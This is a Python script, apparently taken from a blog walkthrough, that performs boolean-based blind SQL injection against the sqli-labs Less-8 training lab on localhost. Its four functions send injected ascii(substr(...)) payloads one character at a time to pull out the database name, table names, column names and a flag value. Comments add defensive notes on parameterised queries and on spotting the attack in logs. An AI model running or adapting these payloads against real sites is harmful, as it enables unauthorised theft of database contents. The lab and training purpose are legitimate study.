# Boolean-based blind SQL injection walkthrough against the sqli-labs "Less-8"
# exercise (a deliberately vulnerable training target served from 127.0.0.1,
# see `url` below).  Every request asks the database one yes/no question of
# the form  ascii(substr(<value>, pos, 1)) = <code>  and reads the answer from
# whether the returned page contains the marker "You are in...........".
#
# Defensive take-aways: the payload opens with `1'`, i.e. the `id` value is
# spliced into a quoted SQL literal by string concatenation — a parameterised
# query removes the flaw outright.  On the detection side the script's
# signature is a burst of up to 95 near-identical GET requests per recovered
# character, differing only in the numeric comparison at the end of the
# query string; that pattern stands out in access logs and is easy to match
# with a WAF rule.
#
# NOTE(review): the listing this was taken from had lost all line breaks and
# indentation.  The block structure below (prints inside the matching `if`,
# `else: break` as the tail of each `if i == ...` chain) is the most plausible
# reading and should be checked against the original file.

import requests
import string  # NOTE(review): imported but never used below

# The local sqli-labs Less-8 page; every payload is appended to this URL.
url = "http://127.0.0.1/sqlilabs/Less-8/"


def get_dbname():
    """Recover the current database name one character at a time.

    For each position 1..8 and each printable ASCII code 32..126 a request
    is sent whose injected condition is true only when that character
    matches; the lab prints "You are in..........." for a true condition,
    which is the single bit of information each request leaks.
    """
    db_name = ''
    for i in range(1, 9):  # character position; the name is guessed to be at most 8 characters, extend the range if it is longer
        for j in range(32, 127):  # 32..126 are the printable ASCII codes
            payload = "?id=1'and ascii(substr(database(),%d,1))=%d --+" % (i, j)  # injected boolean condition
            url1 = url + payload  # original url + injected query string
            res = requests.get(url1)  # page produced with the injected condition in place
            if "You are in..........." in res.text:  # the lab shows this marker only when the query succeeded, so its presence is the oracle
                db_name += chr(j)  # matching character, kept for output
                print("数据库名称为:" + db_name)


get_dbname()


def get_table():
    """Recover the first four table names of the `security` schema.

    The outer loop walks the LIMIT offset (one table per offset), the middle
    loop the character position, the inner loop the candidate ASCII code.
    Each recovered character is printed immediately with its table's prefix.
    """
    table1_name = ''
    table2_name = ''
    table3_name = ''
    table4_name = ''
    for i in range(5):  # the schema holds several tables, so an extra loop walks the LIMIT offset
        for j in range(6):  # character position within the table name
            for k in range(32, 127):  # candidate ASCII code
                payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1))=%d--+" % (
                    i, j, k)
                url2 = url + payload
                res = requests.get(url2)
                if "You are in..........." in res.text:  # true condition -> character k at position j of table i
                    if i == 0:
                        table1_name += chr(k)
                        print("第一个表为:" + table1_name)
                    elif i == 1:
                        table2_name += chr(k)
                        print("第二个表为:" + table2_name)
                    elif i == 2:
                        table3_name += chr(k)
                        print("第三个表为:" + table3_name)
                    elif i == 3:
                        table4_name += chr(k)
                        print("第四个表为:" + table4_name)
                    else:  # only four names are collected; offsets beyond that are abandoned
                        break


get_table()


def get_columns():
    """Recover the first three column names of the table named `flag`.

    Same shape as get_table(): LIMIT offset (i), character position (k,
    1..8) and candidate ASCII code (j); each hit is printed as it arrives.
    """
    column1 = ''
    column2 = ''
    column3 = ''
    for i in range(3):  # LIMIT offset -> which column
        for k in range(1, 9):  # character position within the column name
            for j in range(32, 127):  # candidate ASCII code
                payload = "?id=1'and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit %d,1),%d,1))=%d--+" % (
                    i, k, j)
                url3 = url + payload
                res = requests.get(url3)
                if "You are in..........." in res.text:  # true condition -> character j at position k of column i
                    if i == 0:
                        column1 += chr(j)
                        print("第一个字段为->" + column1)
                    elif i == 1:
                        column2 += chr(j)
                        print("第二个字段为->" + column2)
                    elif i == 2:
                        column3 += chr(j)
                        print("第三个字段为->" + column3)
                    else:  # unreachable with range(3); kept as written
                        break


get_columns()


def get_flag():
    """Recover the value of column `flag` in table `flag`, up to 30 characters.

    Outer loop is the character position, inner loop the candidate ASCII
    code; every hit extends `flag` and prints the partial value.
    """
    flag = ''
    for i in range(30):  # character position
        for k in range(32, 127):  # candidate ASCII code
            payload = "?id=1'and ascii(substr((select flag from flag),%d,1))=%d--+" % (i, k)
            url4 = url + payload
            res = requests.get(url4)
            if "You are in..........." in res.text:  # true condition -> character k at position i
                flag += chr(k)
                print("flag为->" + flag)


get_flag()
# NOTE(review): the source listing ended with a stray "ag()" fragment right
# after this call (apparently a copy artefact); it is not valid Python and is
# omitted here.
sql-lab less8 python脚本
本文介绍了一个使用Python的脚本,通过SQL注入技术来探测并获取数据库名称、表名、字段名以及flag值。该脚本利用`requests`库进行GET请求,逐步猜测ASCII字符来实现对特定数据库的探索。